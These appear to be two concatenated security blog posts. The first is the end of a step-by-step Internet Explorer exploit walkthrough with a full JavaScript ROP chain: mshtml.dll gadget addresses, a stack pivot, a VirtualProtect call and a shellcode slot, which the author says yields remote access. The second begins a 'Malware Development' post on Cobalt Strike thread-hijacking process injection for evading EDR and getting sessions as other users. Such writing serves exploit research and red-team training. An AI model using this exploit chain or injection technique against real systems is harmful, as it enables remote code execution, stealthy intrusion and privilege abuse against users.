rop = "\u9090\u9090";             // Padding for the previous ROP gadget (add esp, 0xC ; ret)

// Our ROP chain begins here
rop += "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";

// Combine everything
vftable += rop;

What we know so far, is that this fake vftable will be loaded on the stack. When this happens, our original xchg eax, esp ; ret gadget will still be there, and we will need a way to make sure we don’t execute it again. The way we are going to do this is to replace our 41414141 bytes with several ret opcodes that will lead to an eventual add esp, 0xC ; ret ROP gadget, which will jump over the xchg eax, esp ; ret gadget and into our final ROP chain!

Rerunning the new POC shows us program execution has skipped over the virtual function table and into our ROP chain! I will go into detail about the ROP chain, but from here on out there is nothing special about this exploit. Just as previous blogs of mine have outlined, constructing a ROP chain is simply the same at this point. For getting started with ROP, please refer to these posts. This post will just walk through the ROP chain constructed for this exploit.

The first of the 8 43434343 DWORDS is in ESP, with the other 7 DWORDS located on the stack.

This is great news. From here, we just have a simple task of developing a 32-bit ROP chain! The first step is to get a stack address loaded into a register, so we can use it for RVA calculations. Note that although the stack changes addresses between each instance of a process (usually), this is not a result of ASLR, this is just a result of memory management.

Looking through mshtml.dll we can see there is are two great candidates to get a stack address into EAX and ECX.

pop esp ; pop eax ; ret

mov ecx, eax ; call edx

Notice, however, the mov ecx, eax instruction ends in a call. We will first pop a gadget that β€œreturns to the stack” into EDX. When the call occurs, our stack will get a return address pushed onto the stack. To compensate for this, and so program execution doesn’t execute this return address, we simply can add to ESP to essentially β€œjump over” the return address. Here is what this block of ROP chains look like.

// Our ROP chain begins here
rop += "\ud937\u74e7";                     // push esp ; pop eax ; ret (74e7d937) (mshtml.dll) Get a stack address into a controllable register
rop += "\u9d55\u74c2";                     // pop edx ; ret (74c29d55) (mshtml.dll) Prepare EDX for COP gadget
rop += "\u07be\u74fb";                     // add esp, 0xC ; ret (74fb07be) (mshtml.dll) Return back to the stack and jump over the return address form previous COP gadget
rop += "\udfbc\u74db";                     // mov ecx, eax ; call edx (74dbdfbc) (mshtml.dll) Place EAX, which contains a stack address, into ECX
rop += "\u9090\u9090";                     // Padding to compensate for previous COP gadget
rop += "\u9090\u9090";                     // Padding to compensate for previous COP gadget
rop += "\u9365\u750c";                     // add esp, 0x18 ; pop ebp ; ret (750c9365) (mshtml.dll) Jump over parameter placeholders into ROP chain

// Parameter placeholders
// The Import Address Table of mshtml.dll has a direct pointer to VirtualProtect 
// 74c21308  77e250ab kernel32!VirtualProtectStub
rop += "\u1308\u74c2";                     // kernel32!VirtualProtectStub IAT pointer
rop += "\u1111\u1111";                     // Fake return address placeholder
rop += "\u2222\u2222";                     // lpAddress (Shellcode address)
rop += "\u3333\u3333";                     // dwSize (Size of shellcode)
rop += "\u4444\u4444";                     // flNewProtect (PAGE_EXECUTE_READWRITE, 0x40)
rop += "\u5555\u5555";                     // lpflOldProtect (Any writable page)

// Arbitrary write gadgets to change placeholders to valid function arguments
rop += "\u9090\u9090";                     // Compensate for pop ebp instruction from gadget that "jumps" over parameter placeholders
rop += "\u9090\u9090";                     // Start ROP chain

After we get a stack address loaded into EAX and ECX, notice how we have constructed β€œparameter placeholders” for our call to eventually VirtualProtect, which will mark the stack as RWX, and we can execute our shellcode from there.

Recall that we have control of the stack, and everything within the rop variable is on the stack. We have the function call on the stack, because we are performing this exploit on a 32-bit system. 32-bit systems, as you can recall, leverage the __stdcall calling convention on Windows, by default, which passes function arguments on the stack. For more information on how this ROP method is constructed, you can refer to a previous blog I wrote, which outlines this method.

After running the updated POC, we can see that we land on the 90909090 bytes, which is in the above POC marked as β€œStart ROP chain”, which is the last line of code. Let’s check a few things out to confirm we are getting expected behavior.

Our ROP chain starts out by saving ESP (at the time) into EAX. This value is then moved into ECX, meaning EAX and ECX both contain addresses that are very close to the stack in its current state. Let’s check the state of the registers, compared to the value of the stack.

As we can see, EAX and ECX contain the same address, and both of these addresses are part of the address space of the current stack! This is great, and we are now on our way. Our goal now will be to leverage the preserved stack addresses, place them in strategic registers, and leverage arbitrary write gadgets to overwrite the stack addresses containing the placeholders with our actual arguments.

As mentioned above, we know that Internet Explorer, when spawned, creates at least two processes. Since our exploit additionally forks another process from Internet Explorer, we are going to work backwards now. Let’s leverage Process Hacker in order to see the process tree when Internet Explorer is spawned.

The processes we have been looking at thus far are the child processes of the original Internet Explorer parent. Notice however, when we run our POC (which is not a complete exploit and still causes a crash), that a third Internet Explorer process is created, even though we are opening this file from the second Internet Explorer process.

This, thus far, has been unbeknownst to us, as we have been leveraging WinDbg in a postmortem fashion. However, we can get around this by debugging just simply waiting until the third process is created! Each time we have executed the script, we have had a prompt to ask us if we want to allow JavaScript. We will use this as a way to debug the correct process. First, open up Internet Explorer how you usually would. Secondly, before attaching your debugger, open the exploit script in Internet Explorer. Don’t click on β€œClick here for options…”.

This will create a third process, and will be the last process listed in WinDbg under β€œSystem order”

Note that you do not need to leverage Process Hacker each time to identify the process. Open up the exploit, and don’t accept the prompt yet to execute JavaScript. Open WinDbg, and attach to the very last Internet Explorer process.

Now that we are debugging the correct process, we can actually set some breakpoints to verify everything is intact. Let’s set a breakpoint on β€œjump” over the parameter placeholders for our ROP chain and execute our POC.

Great! Stepping through the instruction(s), we then finally land into our 90909090 β€œROP gadget”, which symbolizes where our β€œmeaningful” ROP chain will start, and we can see we have β€œjumped” over the parameter placeholders!

From our current execution state, we know that ECX/EAX contain a value near the stack. The distance between the first parameter placeholder, which is an IAT entry which points to kernel32!VirtualProtectStub, is 0x18 bytes away from the value in ECX.

Our first goal will be to take the value in ECX, increase it by 0x18, perform two dereference operations to first dereference the pointer on the stack to obtain the actual address of the IAT entry, and then to dereference the actual IAT entry to get the address of kernel32!VirtualProtect. This can be seen below.

// Arbitrary write gadgets to change placeholders to valid function arguments
rop += "\udfee\u74e7";                     // add eax, 0x18 ; ret (74e7dfee) (mshtml.dll) EAX is 0x18 bytes away from the parameter placeholder for VirtualProtect
rop += "\udfbc\u74db";                     // mov ecx, eax ; call edx (74dbdfbc) (mshtml.dll) Place EAX into ECX (EDX still contains our COP gadget)
rop += "\u9090\u9090";                     // Padding to compensate for previous COP gadget
rop += "\u9090\u9090";                     // Padding to compensate for previous COP gadget
rop += "\uf5c9\u74cb";                     // mov eax, dword [eax] ; ret (74cbf5c9) (mshtml.dll) Dereference the stack pointer offset containing the IAT entry for VirtualProtect
rop += "\uf5c9\u74cb";                     // mov eax, dword [eax] ; ret (74cbf5c9) (mshtml.dll) Dereference the IAT entry to obtain a pointer to VirtualProtect
rop += "\u8d86\u750c";                     // mov dword [ecx], eax ; ret (750c8d86) (mshtml.dll) Arbitrary write to overwrite stack address with parameter placeholder for VirtualProtect

The above snippet will take the preserved stack value in EAX and increase it by 0x18 bytes. This means EAX will now hold the stack value that points to the VirtualProtect parameter placeholder. This value is also copied into ECX, and our previously used COP gadget is leveraged. Then, the value in EAX is dereferenced to get the pointer the stack address points to in EAX (which is the VirtualProtect IAT entry). Then, the IAT entry is dereferenced to get the actual value of VirtualProtect into EAX. ECX, which has the value from EAX inside of it, which is the pointer on the stack to the parameter placeholder for VirtualProtect is overwritten with an arbitrary write gadget to overwrite the stack address with the actual address of VirtualProtect. Let’s set a breakpoint on the previously used add esp, 0x18 gadget used to jump over the parameter placeholders.

Executing the updated POC, we can see EAX now contains the stack address which points to the IAT entry to VirtualProtect.

Stepping through the COP gadget, which loads EAX into ECX, we can see that both registers contain the same value now.

Stepping through, we can see the stack address is dereferenced and placed in EAX, meaning there is now a pointer to VirtualProtect in EAX.

We can dereference the address in EAX again, which is an IAT pointer to VirtualProtect, to load the actual value in EAX. Then, we can overwrite the value on the stack that is our β€œplaceholder” for the VirtualProtect function, using an arbitrary write gadget.

As we can see, the value in ECX, which is a stack address which used to point to the parameter placeholder now points to the actual VirtualProtect address!

The next goal is the next parameter placeholder, which represents a β€œfake” return address. This return address needs to be the address of our shellcode. Recall that when a function call occurs, a return address is placed on the stack. This address is used by program execution to let the function know where to redirect execution after completing the call. We are leveraging this same concept here, because right after the page in memory that holds our shellcode is marked as RWX, we would like to jump straight to it to start executing.

Let’s first generate some shellcode and store it in a variable called shellcode. Let’s also make our ROP chain a static size of 100 DWORDS, or a total length of 100 ROP gadgets.

rop += "\uf5c9\u74cb";                     // mov eax, dword [eax] ; ret (74cbf5c9) (mshtml.dll) Dereference the IAT entry to obtain a pointer to VirtualProtect
rop += "\u8d86\u750c";                     // mov dword [ecx], eax ; ret (750c8d86) (mshtml.dll) Arbitrary write to overwrite stack address with parameter placeholder for VirtualProtect

// Placeholder for the needed size of our ROP chains
for (i=0; i < 0x500/4 - 0x16; i++)
rop += "\u9090\u9090";

// Create a placeholder for our shellcode, 0x400 in size
shellcode = "\u9191\u9191";

for (i=0; i < 0x396/4-1; i++)
shellcode += "\u9191\u9191"

This will create several more addresses on the stack, which we can use to get our calculations in order. The ROP variable is prototyped for 0x500 total bytes worth of gadgets, and keeps track of each DWORD that has already been put on the stack, meaning it will shrink in size dynamically as more gadgets are used up, meaning we can reliably calculate where our shellcode is on the stack without more gadgets pushing the shellcode further and further down. 0x16 in the for loop keeps track of how many gadgets have been used so far, in hexadecimal, and every time we add a gadget we need to increase this number by how many gadgets are added. There are probably better ways to mathematically calculate this, but I am more focused on the concepts behind browser exploitation, not automation.

We know that our shellcode will begin where our 91919191 opcodes are. Eventually, we will prepend our final payload with a few NOPs, just to ensure stability. Now that we have our first argument in hand, let’s move on to the fake return address.

We know that the stack address containing the now real first argument for our ROP chain, the address of VirtualProtect, is in ECX. This means the address right after would be the parameter placeholder for our return address.

We can see that if we increase ECX by 4 bytes, we can get the stack address pointing to the return address placeholder into ECX. From there, we can place the location of the shellcode into EAX, and leverage our arbitrary write gadget to overwrite the placeholder parameter with the actual argument we would like to pass, which is the address of where the 91919191 bytes start (a.k.a our shellcode address).

We can leverage the following gadgets to increase ECX.

rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the fake return address parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the fake return address parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the fake return address parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the fake return address parameter placeholder

Don’t forget also to increase the variable used in our for loop previously with 4 more ROP gadgets (for a total of 0x1a, or 26). It is expected from here on out that this number is increase and compensates for each additional gadget needed.

After increasing ECX, we can see that the parameter placeholder’s address for the return address is in ECX.

We also know that the distance between the value in ECX and where our shellcode starts is 0x4dc, or fffffb24 in a negative representation. Recall that if we placed the value 0x4dc on the stack, it would translate to 0x000004dc, which contains NULL bytes, which would break out exploit. This way, we leverage the negative representation of the value, which contains no NULL bytes, and we eventually will perform a negation operation on this value.

So to start, let’s place this negative representation between the current value in ECX, which is the stack address that points to 11111111, or our parameter placeholder for the return address, and our shellcode location (91919191) into EAX.

rop += "\ubfd3\u750c";                     // pop eax ; ret (750cbfd3) (mshtml.dll) Place the negative distance between the current value of ECX (which contains the fake return parameter placeholder on the stack) and the shellcode location into EAX 
rop += "\ufc80\uffff";                     // Negative distance described above (fffffc80)

From here, we will perform the negation operation on EAX, which will place the actual value of 0x4dc into EAX.

rop += "\u8cf0\u7504";                     // neg eax ; ret (75048cf0) (mshtml.dll) Place the actual distance to the shellcode into EAX

As mentioned above, we know we want to eventually get the stack address which points to our shellcode into EAX. To do so, we will need to actually add the distance to our shellcode to the address of our return parameter placeholder, which currently is only in ECX. There is a nice ROP gadget that can easily add to EAX in mshtml.dll.

add eax, ebx ; ret

In order to add to EAX, we first need to get distance to our shellcode into EBX. To do this, there is a nice COP gadget available to us.

mov ebx, eax ; call edi

We first are going to start by preparing EDI with a ROP gadget that returns to the stack, as is common with COP.

rop += "\u4d3d\u74c2";                     // pop edi ; ret (74c24d3d) (mshtml.dll) Prepare EDI for a COP gadget 
rop += "\u07be\u74fb";                     // add esp, 0xC ; ret (74fb07be) (mshtml.dll) Return back to the stack and jump over the return address form previous COP gadget

After, let’s then store the distance to our shellcode into EBX, and compensate for the previous COP gadget’s return to the stack.

rop += "\uc0c8\u7512";                     // mov ebx, eax ; call edi (7512c0c8) (mshtml.dll) Place the distance to the shellcode into EBX
rop += "\u9090\u9090";                     // Padding to compensate for previous COP gadget
rop += "\u9090\u9090";                     // Padding to compensate for previous COP gadget

We know ECX current holds the address of the parameter placeholder for our return address, which was the base address used in our calculation for the distance between this placeholder and our shellcode. Let’s move that address into EAX.

rop += "\u9449\u750c";                     // mov eax, ecx ; ret (750c9449) (mshtml.dll) Get the return address parameter placeholder stack address back into EAX

Let’s now step through these ROP gadgets in the debugger.

Execution hits EAX first, and the negative distance to our shellcode is loaded into EAX.

After the return to the stack gadget is loaded into EDI, to prepare for the COP gadget, the distance to our shellcode is loaded into EBX. Then, the parameter placeholder address is loaded into EAX.

Since the address of the return address placeholder is in EAX, we can simply add the value of EBX to it, which is the distance from the return address placeholder, to EAX, which will result in the stack address that points to the beginning of our shellcode into EAX. Then, we can leverage the previously used arbitrary write gadget to overwrite what ECX currently points to, which is the stack address pointing to the return address parameter placeholder.

rop += "\u5a6c\u74ce";                     // add eax, ebx ; ret (74ce5a6c) (mshtml.dll) Place the address of the shellcode into EAX
rop += "\u8d86\u750c";                     // mov dword [ecx], eax ; ret (750c8d86) (mshtml.dll) Arbitrary write to overwrite stack address with parameter placeholder for the fake return address, with the address of the shellcode

We can see that the address of our shellcode is in EAX now.

Leveraging the arbitrary write gadget, we successfully overwrite the return address parameter placeholder on the stack with the actual argument, which is our shellcode!

Perfect! The next parameter is also easy, as the parameter placeholder is located 4 bytes after the return address (lpAddress). Since we already have a great arbitrary write gadget, we can just increase the target location 4 bytes, so that the parameter placeholder for lpAddress is placed into ECX. Then, since the address of our shellcode is already in EAX, we can just reuse this!

rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the lpAddress parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the lpAddress parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the lpAddress parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the lpAddress parameter placeholder
rop += "\u8d86\u750c";                     // mov dword [ecx], eax ; ret (750c8d86) (mshtml.dll) Arbitrary write to overwrite stack address with parameter placeholder for lpAddress, with the address of the shellcode

As we can see, we have now taken care of the lpAddress parameter.

Next up is the size of our shellcode. We will be specifying 0x401 bytes for our shellcode, as this is more than enough for a shell.

rop += "\ubfd3\u750c";                     // pop eax ; ret (750cbfd3) (mshtml.dll) Place the negative representation of 0x401 in EAX
rop += "\ufbff\uffff";                     // Value from above
rop += "\u8cf0\u7504";                     // neg eax ; ret (75048cf0) (mshtml.dll) Place the actual size of the shellcode in EAX
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the dwSize parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the dwSize parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the dwSize parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the dwSize parameter placeholder
rop += "\u8d86\u750c";                     // mov dword [ecx], eax ; ret (750c8d86) (mshtml.dll) Arbitrary write to overwrite stack address with parameter placeholder for dwSize, with the size of our shellcode

Similar to last time, we know we cannot place 0x00000401 on the stack, as it contains NULL bytes. Instead, we load the negative representation into EAX and negate it. We also know the dwSize parameter placeholder is 4 bytes after the lpAddress parameter placeholder. We increase ECX, which has the address of the lpAddress placeholder, by 4 bytes to place the dwSize placeholder in ECX. Then, we leverage the same arbitrary write gadget again.

Perfect! We will leverage the exact same routine for the flNewProcect parameter. Instead of the negative value of 0x401 this time, we need to place 0x40 into EAX, which corresponds to the memory constant PAGE_EXECUTE_READWRITE.

rop += "\ubfd3\u750c";                     // pop eax ; ret (750cbfd3) (mshtml.dll) Place the negative representation of 0x40 (PAGE_EXECUTE_READWRITE) in EAX
rop += "\uffc0\uffff";             // Value from above
rop += "\u8cf0\u7504";                     // neg eax ; ret (75048cf0) (mshtml.dll) Place the actual memory constraint PAGE_EXECUTE_READWRITE in EAX
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the flNewProtect parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the flNewProtect parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the flNewProtect parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the flNewProtect parameter placeholder
rop += "\u8d86\u750c";                     // mov dword [ecx], eax ; ret (750c8d86) (mshtml.dll) Arbitrary write to overwrite stack address with parameter placeholder for flNewProtect, with PAGE_EXECUTE_READWRITE

Great! The last thing we need to to just overwrite the last parameter placeholder, lpflOldProtect, with any writable address. The .data section of a PE will have memory that is readable and writable. This is where we will go to look for a writable address.

The end of most sections in a PE contain NULL bytes, and that is our target here, which ends up being the address 7515c010. The image above shows us the .data section begins at mshtml+534000. We can also see it is 889C bytes in size. Knowing this, we can just access .data+8000, which should be near the end of the section.

The routine here is identical to the previous two ROP routines, except there is no negation operation that needs to take place. We simply just need to pop this address into EAX and leverage our same, trusty arbitrary write gadget to overwrite the last parameter placeholder.

rop += "\ubfd3\u750c";                     // pop eax ; ret (750cbfd3) (mshtml.dll) Place a writable .data section address into EAX for lpflOldPRotect
rop += "\uc010\u7515";             // Value from above (7515c010)
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the lpflOldProtect parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the lpflOldProtect parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the lpflOldProtect parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the lpflOldProtect parameter placeholder
rop += "\u8d86\u750c";                     // mov dword [ecx], eax ; ret (750c8d86) (mshtml.dll) Arbitrary write to overwrite stack address with parameter placeholder for lpflOldProtect, with an address that is writable

Awesome! We have fully instrumented our call to VirtualProtect. All that is left now is to kick off execution by returning into the VirtualProtect address on the stack. To do this, we will just need to load the stack address which points to VirtualProtect into EAX. From there, we can execute an xchg eax, esp ; ret gadget, just like at the beginning of our ROP chain, to return back into the VirtualProtect address, kicking off our function call. We know currently ECX contains the stack address pointing to the last parameter, lpflOldProtect.

We can see that our current value in ECX is 0x14 bytes in front of the VirtualProtect stack address. This means we can leverage several dec ecx ; ret ROP gadgets to get ECX 0x14 bytes lower. From there, we can then move the ECDX register into the EAX register, where we can perform the exchange.

rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\u9449\u750c";                     // mov eax, ecx ; ret (750c9449) (mshtml.dll) Get the stack address of VirtualProtect into EAX
rop += "\ua1ea\u74c7";                     // xchg esp, eax ; ret (74c7a1ea) (mshtml.dll) Kick off the function call

We can also replace our shellcode with some software breakpoints to confirm our ROP chain worked.

// Create a placeholder for our shellcode, 0x400 in size
shellcode = "\uCCCC\uCCCC";

for (i=0; i < 0x396/4-1; i++)
shellcode += "\uCCCC\uCCCC";

After ECX is incremented, we can see that it now contains the VirtualProtect stack address. This is then passed to EAX, which then is exchanged with ESP to load the function call into ESP! The, the ret part of the gadget takes the value at ESP, which is VirtualProtect, and loads it into EIP and we get successful code execution!

After replacing our software breakpoints with meaningful shellcode, we successfully obtain remote access!


I know this was a very long winded blog post. It has been a bit disheartening to see a lack of beginning to end walkthroughs on Windows browser exploitation, and I hope I can contribute my piece to helping those out who want to get into it, but are intimidated, as I am myself. Even though we are working on legacy systems, I hope this can be of some use. If nothing else, this is how I document and learn. I am excited to continue to grow and learn more about browser exploitation! Until next time.

Peace, love, and positivity :-)

Malware Development: Leveraging Beacon Object Files for Remote Process Injection via Thread Hijacking

9 January 2021 at 00:00


As people I have interacted with will attest, my favorite subject in the entire world is binary exploitation. I love everything about it, from the problem solving aspects to the OS internals, assembly, and C side of the house. I also enjoy pushing my limits in order to find new and creative solutions for exploitation. In addition to my affinity for exploitation, I also love to red team. After all, this is what I do on a day to day basis. While I love to work my way around enterprise networks, I find myself really enjoying the host-based avoidance aspects of red teaming. I find it incredibly fun and challenging to use some of my prerequisite knowledge on exploitation and Windows internals in order to bypass security products and stay undetected (well, try to anyways). With Cobalt Strike, a very popular remote access tool (RAT), being so widely adopted by red teams - I thought I would investigate deeper into a newer Cobalt Strike capability, Beacon Object Files, which allow operators to write post-exploitation capabilities in C (which makes me incredibly happy as a person). This blog will go over a technique known as thread hijacking and integrating it into a usable Beacon Object File.

However, before beginning, I would like to delineate this post will be focused on the technique of remote process injection, thread hijacking, and thread restoration - not so much on Beacon Object Files themselves. Beacon Object Files, for our purposes, are a means to an end, as this technique can be deployed in many other fashions. As was aforementioned, Cobalt Strike is widely adopted and I think it is a great tool and I am a big proponent of it. I still believe at the end of the day, however, it is more important to understand the overarching concept surrounding a TTP (Tactic, Technique, and Procedure), versus learning how to just arbitrarily run a tool, which in turn will create a bottleneck in your red teaming methodology by relying on a tool itself. If Cobalt Strike went away tomorrow, that shouldn’t render this TTP, or any other TTPs, useless. However, almost contradictory, this first portion of this post will briefly outline what Beacon Object Files are, a quick recap on remote process injection, and a bit on writing code that adheres to the needs of Beacon Object Files.

Lastly, the final project can be found here.

Beacon Object Files - You have two minutes, go.

Back in June, I saw a very interesting blog post from Cobalt Strike that outlined a new Beacon capability, known as Beacon Object Files. Beacon Object Files, stylized as BOFs, are essentially compiled C programs that are executed as position-independent code within Beacon. You bring the object file and Cobalt Strike supplies the linking. Raphael Mudge, the creator of Cobalt Strike, has a YouTube video that goes over the intrinsics, capabilities, and limitations of BOFs. I highly recommend you check out this video. In addition, I encourage you to check out TrustedSec’s BOF blog and project to supplement the available Cobalt Strike documentation for BOF development.

One thing to note before moving on is that BOFs are intended to be β€œlightweight” tools. Lightweight may be subjective, but as Raphael points out in his video and blog, the main benefit of BOFs are twofold:

  1. BOFs do not spawn a temporary β€œsacrificial” process to perform post-exploitation work - they’re directly executed as position-independent code within the current Beacon process, increasing overall OPSEC (operational security).
  2. BOFs are really meant to interact with the Windows API and the internal Beacon API, as BOFs expose a set of functions operators can use when developing. This means BOFs are smaller in size and easily allow you to invoke Window APIs and interact with the internal Beacon API.

Additionally, there are a few drawbacks to BOFs:

  1. Cobalt Strike is the linker for BOFs - meaning libc style functions like strlen will not resolve. To compensate for this, however, you can use BOF compliant decorators in your function prototypes with the MSVCRT (Microsoft C Run-time) library and grab such functions from there. Declaring and using such functions with BOFs will be outlined in the latter portions of this post. Additionally, from Raphael’s CVE-2020-0796 BOF, there are ways to define your own C-style functions.
  2. BOFs are executed within the current Beacon process - meaning that if your BOF encounters some kind of internal error and fails, your Beacon process will crash as well. This means BOFs should be carefully vetted and tested across multiple systems, networks, and environments, while also implementing host-based checks for version information, using properly documented data types and structures outlined in a function’s prototype, and cleaning up any opened handles, allocated memory, etc.

Now that that’s out of the way, let’s get into a bit of background on remote process injection and thread hijacking, as well as outline our BOF’s execution flow.

Remote Process Injection

Remote process injection, for the unfamiliar, is a technique in which an operator can inject code into another process on a machine, under certain circumstances. This is most commonly done with a chain of Windows APIs being called in order to allocate some memory in the other process, write user-defined memory (usually a shellcode of some sort) to that allocation, and kicking off execution by create a thread within the remote process. The APIs, VirtualAllocEx, WriteProcessMemory, and CreateRemoteThread are often popular choices, respectively.

Why is remote process injection important? Take a look at the image below, which is a listing of processes performed inside of a Cobalt Strike Beacon implant.

As is seen above, Cobalt Strike not only discloses to the operator what processes are running, but also under what user context a certain process is running under. This could be very useful on a penetration test in an Active Directory environment where the goal is to obtain domain administrative access. Let’s say you as an operator obtain access to a server where there are many users logged in, including a user with domain administrative access. This means that there is a great likelihood there will be processes running in context of this high-value user. This concept can be seen below where a second process listing is performed where another user, ANOTHERUSER has a PowerShell.exe process running on the host.

Using Cobalt Strike’s built-in inject capability, a raw Beacon implant can be injected into the PowerShell.exe process utilizing the remote injection technique outlined in the Cobalt Strike Malleable C2 profile, resulting in a second callback, in context of the ANOTHERUSER user, using the PID of the PowerShell.exe instance, process architecture (64-bit), and the name of the Cobalt Strike listener as arguments.

After the injection, there is a successful callback, resulting in a valid session in context of the OTHERUSER user.

This is useful to a red team operator, as the credentials for the OTHERUSER were not needed in order to obtain access in context of said user. However, there are a few drawbacks - including the addition of endpoint detection and response (EDR) products that detect on such behavior. One of the indicators of compromise (IOC) would be, in this instance, a remote thread being created in a remote process. There are more IOCs for this TTP, but this blog will focus on circumventing the need to create a remote thread. Instead, let’s examine thread hijacking, a technique in which an already existing thread within the target process is suspended and manipulated in order to execute shellcode.

Thread Hijacking and Thread Restoration

As mentioned earlier, the process for a typical remote injection is:

  1. Allocate a memory region within the target process using VirtualAllocEx. A handle to the target process must already be existing with an access right of at least PROCESS_VM_OPERATION in order to leverage this API successfully. This handle can be obtained using the Windows API function OpenProcess.
  2. Write your code to the allocated region using WriteProcessMemory. A handle to the target process must already be existing with an access right of at least PROCESS_WRITE and the previously mentioned PROCESS_VM_OPERATION - meaning a handle to the remote process must have both of these access rights at minimum to perform remote injection.
  3. Create a remote thread, within the remote process, to execute the shellcode, using CreateRemoteThread.

Our thread hijacking technique will utilize the first two members of the previous list, but instead of CreateRemoteThread, our workflow will consist of the following:

  1. Open a handle to the remote process using the aforementioned access rights required by VirtualAllocEx and WriteProcessMemory.
  2. Loop through the threads on the machine utilizing the Windows API CreateToolhelp32Snapshot. This loop will contain logic to break upon identifying the first thread within the target process.
  3. Upon breaking the loop, open a handle to the target thread using the Windows API function OpenThread.
  4. Call SuspendThread, passing the former thread handle mentioned as the argument. SuspendThread requires the handle has an access right of THREAD_SUSPEND_RESUME.
  5. Call GetThreadContext, using the thread handle. This function requires that handles have a THREAD_GET_CONTEXT access right. This function will dump the current state of the target thread’s CPU registers, processor flags, and other CPU information into a CONTEXT record. This is because each thread has its own stack, CPU registers, etc. This information will be later used to execute our shellcode and to restore the thread once execution has completed.
